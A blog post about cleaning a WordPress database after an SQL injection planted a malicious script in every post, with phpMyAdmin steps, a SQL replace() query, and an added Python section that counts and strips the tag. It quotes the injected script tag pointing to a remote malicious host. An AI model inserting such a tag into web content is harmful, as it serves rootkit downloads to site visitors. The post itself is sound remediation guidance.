Early today, a friend, Calvin Chew, tweeted me about an antivirus alert on my site. I immediately looked into it and did some research on the internet.

It turned out that code linking to a remote malicious JavaScript file had been inserted into each of my five-hundred-something pages and posts through an SQL injection attack. The script redirects visitors to a rogue antivirus page that downloads a rootkit onto the local system upon any click, even one to close the window. This JavaScript trojan is said to mostly affect MediaTemple-hosted WordPress blogs.

I managed to successfully clear the databases in less than an hour, on the phone. If your blog has been compromised, read on to find out how.

It would help if you knew as many details of the injection as possible. For example, Kaspersky Internet Security will report the threat name and URL. This can save time and speed up the remedial process.

Step 1:

Change your database user password. On MediaTemple, you can log into the (mt) AccountCenter, then navigate to your server controls and click on “Manage Databases”. Update your password under the “Global Settings” tab.

Step 2:

Log into phpMyAdmin. The “Admin” buttons in “Databases List” will lead you there.

Step 3:

On the left-hand sidebar, click on the database of your blog which has been compromised.

Step 4:

It may be wise to back up your database first, just in case anything goes wrong.

Step 5:

Run a search for </script> in all tables of the database. This will return the rows that contain JavaScript code (including valid code that you have added yourself). Browse to a row in which you do not remember adding any code, and identify the remote URL of the offending script. Copy the entire line of code, which in my case is <script src="http://ao.euuaw.com/9"></script> (warning: don’t access the URL!).

Step 6:

Now return to the main page of your database and click on the “SQL” tab at the top. Enter the following query:

UPDATE wp_posts SET post_content = replace(post_content,'<script src="http://ao.euuaw.com/9"></script>','');

Here’s what it does: the first part says “access the ‘wp_posts’ table”, and the second says “look into the ‘post_content’ field”. By default, your table names begin with the “wp_” prefix; if you chose a different table prefix during installation, use that instead. Then the replace() function does a search-and-replace in the ‘post_content’ field of every row, searching for the JavaScript code (change it to the code you copied earlier) and replacing it with an empty string (essentially deleting it).

Step 7:

Once that is done, your database table should be clear of the injection. Now update your blog’s wp-config.php file with the new database password. On an antimalware-protected system, check whether the malicious Javascript code still exists on your site.
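As an added example (not code from the original post), here is the search of Step 5 and the cleanup query of Step 6 carried out against a constructed in-memory SQLite copy of wp_posts, so that the number of affected rows can be checked before and after the UPDATE. The table layout, the sample rows and the analytics URL in row 3 are assumptions; the injected tag is the one quoted above.

```python
import re
import sqlite3

# Constructed sample rows standing in for a WordPress wp_posts table.
# Rows 1 and 2 carry the injected tag quoted in the post; row 3 carries a
# legitimate script the site owner added, which must survive the cleanup.
INJECTED_TAG = '<script src="http://ao.euuaw.com/9"></script>'
SAMPLE_POSTS = [
    (1, "<p>Hello world</p>" + INJECTED_TAG),
    (2, "<p>Second post</p>" + INJECTED_TAG),
    (3, '<p>About</p><script src="https://example.com/analytics.js"></script>'),
]
SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']([^"\']+)["\']', re.IGNORECASE)


def make_db():
    """Build an in-memory table using the column names WordPress uses."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_content TEXT)")
    db.executemany("INSERT INTO wp_posts VALUES (?, ?)", SAMPLE_POSTS)
    return db


def remote_script_sources(db, table="wp_posts", column="post_content"):
    """Step 5: list every distinct external script URL so unknown ones stand out.
    Table and column names come from trusted code here, never from user input."""
    found = set()
    for (content,) in db.execute(f"SELECT {column} FROM {table}"):
        found.update(SCRIPT_SRC.findall(content))
    return sorted(found)


def count_rows_containing(db, needle, table="wp_posts", column="post_content"):
    """Number of rows whose content still contains the given tag."""
    sql = f"SELECT COUNT(*) FROM {table} WHERE {column} LIKE ?"
    return db.execute(sql, ("%" + needle + "%",)).fetchone()[0]


def strip_injected_tag(db, needle, table="wp_posts", column="post_content"):
    """Step 6: the post's UPDATE ... SET col = replace(col, tag, '') query,
    bracketed by a row count before and after so the result is verifiable."""
    before = count_rows_containing(db, needle, table, column)
    db.execute(f"UPDATE {table} SET {column} = replace({column}, ?, '')", (needle,))
    db.commit()
    after = count_rows_containing(db, needle, table, column)
    return before, after
```

Point the same functions at wp_comments (comment_content) or any other table the Step 5 search flagged, since the injection is not necessarily confined to wp_posts.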

The threat should be fully cleared from your WordPress blog by now. Just to be safe, you may check through your theme and plugin files for any traces of the threat.